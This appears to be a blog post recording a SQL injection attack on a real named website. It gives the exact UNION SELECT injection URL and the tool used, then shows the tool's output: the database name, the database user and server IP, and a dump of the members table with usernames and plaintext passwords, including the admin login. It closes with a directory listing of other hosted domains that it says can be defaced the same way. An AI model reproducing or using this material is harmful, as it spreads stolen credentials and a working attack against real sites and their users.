Tool --> schemafuzz.py v5.0
Admin login page --> http://www.gontha.com/admin/
Admin usr:pwd --> sai:saiman
Dump:
[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 18:57:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: persada_gontha
User: persada_visitor@98.131.15.31
Version: 4.1.20-max-log
[+] Dumping data from database "persada_gontha" Table "members"
[+] Column(s) ['username', 'password', 'admin']
[+] Number of Rows: 6
[0] pfg:pfg01:0:
[1] zul:zulbas:0:
[2] sai:saiman:1:
[3] 0:
[4] yanto:hantu:0:0:0:
[-] [18:57:26]
[-] Total URL Requests 8
[-] Done
Some domains that can be defaced because this exploit
drwx--x--x 12 persadag persadag 4096 Oct 11 03:05 ajfo.com
drwx--xr-x 11 persadag persadag 4096 Oct 11 03:08 catf.javajazzfestival.com
drwx--x--x 10 persadag persadag 4096 Oct 11 03:08 globalhomes-ltd.com
drwx--x--x 18 persadag persadag 4096 Oct 11 03:11 globalyachtsltd.com
drwx--x--x 13 persadag persadag 4096 Oct 11 03:13 gontha.com
drwx--x--x 8 persadag persadag 4096 Oct 10 01:09 indopex.com
drwx--xr-x 8 persadag persadag 4096 Oct 11 03:14 jakartaorientalfestival.com
drwx--x--x 8 persadag persadag 4096 Sep 21 15:23 javaexhibition.com
drwx--x--x 15 persadag persadag 4096 Oct 11 03:22 javajazzfestival.com
drwx--xr-x 16 persadag persadag 4096 Oct 11 02:14 jf-pro.com
drwx--x--x 27 persadag persadag 4096 Oct 3 22:01 nagosin.com
drwx--xr-x 5 persadag persadag 4096 Oct 11 03:21 persadagiriabadi.com
drwx--x--x 12 persadag persadag 4096 Oct 11 03:28 soulnationfestival.com
drwx--xr-x 8 persadag persadag 4096 Oct 11 02:41 wedogreencampaign.com
0 comments:
Post a Comment